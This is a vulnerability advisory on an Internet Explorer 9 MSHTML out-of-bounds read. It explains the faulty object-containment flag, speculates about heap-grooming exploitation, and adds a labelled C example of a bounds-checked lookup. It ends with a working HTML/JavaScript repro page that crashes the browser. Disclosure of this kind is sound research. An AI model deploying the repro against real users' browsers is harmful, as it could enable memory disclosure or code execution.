Microsoft Internet Explorer 9 MSHTML CPtsTextParaclient::CountApes Out-Of-Bounds Read

Posted Nov 5, 2016
Authored by SkyLined

Microsoft Internet Explorer 9 suffers from a MSHTML CPtsTextParaclient::CountApes out-of-bounds read vulnerability.

tags | exploit
SHA-256 | 99089ae366a7f7d4e65b3282f45f00fb4bd55bb17255adf843050757f6024bd8

Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the third
entry in that series.

The below information is also available on my blog at
http://blog.skylined.nl/20161104001.html. There you can find a repro
that triggered this issue in addition to the information below.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 9 MSHTML CPtsTextParaclient::CountApes out-of-bounds read
==============================================================

Synopsis
--------
A specially crafted webpage can cause Microsoft Internet Explorer 9 to
access data before the start of a memory block. An attacker who is able
to control what is stored before this memory block may be able to
disclose information from memory or execute arbitrary code.


Known affected versions, attack vectors and mitigations
-------------------------------------------------------
+ **Microsoft Internet Explorer 9**

An attacker would need to get a target user to open a specially
crafted webpage. As far as can be determined, disabling JavaScript
should prevent an attacker from triggering the vulnerable code path.

Description
-----------
It's quite common in MSIE for an object to "contain" another object in
memory, and for MSIE to add offsets to pointers to find a contained
object, or to subtract offsets to find the container of such a contained
object. It appears that this vulnerability revolves around MSIE assuming
one object is contained inside another, whereas in reality it is not.
The code is using a flag in the object to determine if it is a
"stand-alone" object or a "contained" object. The bug is that either the
code is using this flag incorrectly (the flag is correct, but does not
indicate the object is a "contained" object) or the flag has been set
incorrectly (the code is correct, but the flag should not have been set
as the object is not "contained" in another object).

Eventually, a method is called to operate on an object using a pointer
at an offset *before* allocated memory.
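
The container/contained pattern described above, as an added example that is not part of the original advisory and is not MSHTML code: a constructed Container embeds a Child at a fixed offset, the flag-trusting lookup subtracts that offset to find the Container, and a hardened lookup additionally checks that the derived address lies inside the block the Child was actually allocated in. All type and function names are hypothetical. The derived address is computed in integer arithmetic so that the stale-flag case is demonstrated without ever dereferencing memory before the allocation.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Constructed example: a Container embeds a Child at a fixed offset. Code that only
 * holds a Child* finds its Container by subtracting that offset, relying on a flag in
 * the Child to say whether it is embedded at all. This mirrors the pattern the
 * advisory describes; the names are hypothetical, not MSHTML's. */

#define CHILD_CONTAINED 0x1u

typedef struct Child {
    uint32_t flags;            /* CHILD_CONTAINED means "I live inside a Container" */
    uint32_t value;
} Child;

typedef struct Container {
    uint32_t magic;
    uint32_t count;
    Child    child;            /* embedded at offsetof(Container, child) */
} Container;

/* Minimal record of where a heap block starts and how long it is, so the example can
 * decide whether a derived address is in bounds without dereferencing it. */
typedef struct Block { uintptr_t base; size_t size; } Block;

static int address_in_block(uintptr_t addr, size_t len, const Block *b) {
    return addr >= b->base && addr + len <= b->base + b->size;
}

/* Flag-trusting lookup: returns the address the vulnerable pattern would read from.
 * Integer arithmetic only, so nothing outside the allocation is touched here. */
static uintptr_t container_addr_from_flag(const Child *c) {
    if (!(c->flags & CHILD_CONTAINED)) return 0;
    return (uintptr_t)c - offsetof(Container, child);
}

/* Hardened lookup: the caller passes the block the Child was allocated in, and the
 * derived Container address is accepted only if a whole Container fits inside it.
 * A stale or wrong flag then yields NULL instead of a read before the block. */
static Container *container_of_checked(Child *c, const Block *b) {
    uintptr_t addr = container_addr_from_flag(c);
    if (addr == 0 || !address_in_block(addr, sizeof(Container), b)) return NULL;
    return (Container *)addr;
}

/* Scenario 1: genuinely contained Child with a correct flag; lookup succeeds. */
int scenario_contained(void) {
    Container *ct = calloc(1, sizeof *ct);
    if (!ct) return -1;
    ct->magic = 0xC0DE;
    ct->count = 7;
    ct->child.flags = CHILD_CONTAINED;
    Block b = { (uintptr_t)ct, sizeof *ct };
    Container *found = container_of_checked(&ct->child, &b);
    int ok = (found == ct && found->count == 7);
    free(ct);
    return ok;
}

/* Scenario 2: stand-alone Child whose flag wrongly claims "contained", the situation
 * the advisory describes. The flag-trusting address lands before the Child's block;
 * the checked lookup rejects it. Returns 1 when both observations hold. */
int scenario_stale_flag(void) {
    Child *c = calloc(1, sizeof *c);
    if (!c) return -1;
    c->flags = CHILD_CONTAINED;   /* wrong: this Child is not inside any Container */
    Block b = { (uintptr_t)c, sizeof *c };
    uintptr_t naive = container_addr_from_flag(c);
    int naive_out_of_bounds = (naive != 0) && !address_in_block(naive, sizeof(Container), &b);
    int checked_rejects = (container_of_checked(c, &b) == NULL);
    free(c);
    return naive_out_of_bounds && checked_rejects;
}
```

The point of the bounds record is that a single flag inside the object cannot prove anything about the memory around it; a lookup that derives a pointer outside the object needs an independent source of truth (allocation bounds, an explicit owner pointer, or a type tag at the derived address) before it reads through that pointer.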

Exploitation
------------
Using Heap Feng-Shui, it may be possible to allocate a heap block
immediately before the one used in the bug and control its content in
order to control the data the code is operating on. Unfortunately, at
the time I did not look at what the code did with the data if the access
violation could be prevented, so it's not possible for me to say exactly
what an attacker might do with this vulnerability. But one can speculate
that this might allow an attacker to have the code use some secret value
(e.g. a pointer to a function in a module) in a way that allows him/her
to retrieve the value (i.e. information disclosure). It might be
possible to have the code modify a value located anywhere in memory,
and/or have the code call/jump to a location of an attacker's choosing
(i.e. arbitrary code execution).

I did not investigate the crash on x64, but I can only imagine the code
is the same, but the offsets are different.

Cheers,

SkyLined


Repro:

<!DOCTYPE html>
<!-- This file must be loaded inside an iframe in another web-page to trigger the vulnerability. -->
<html>
<head>
<style>
oElement1 {
position: absolute;
}
oElement2:after {
position: relative;
content: counter(x);
}
</style>
<script>
onload = function () {
oElement1 = document.createElement('oElement1');
document.documentElement.appendChild(oElement1);
oElement2 = document.createElement('oElement2');
document.documentElement.appendChild(oElement2);
};
</script>
</head>
</html>
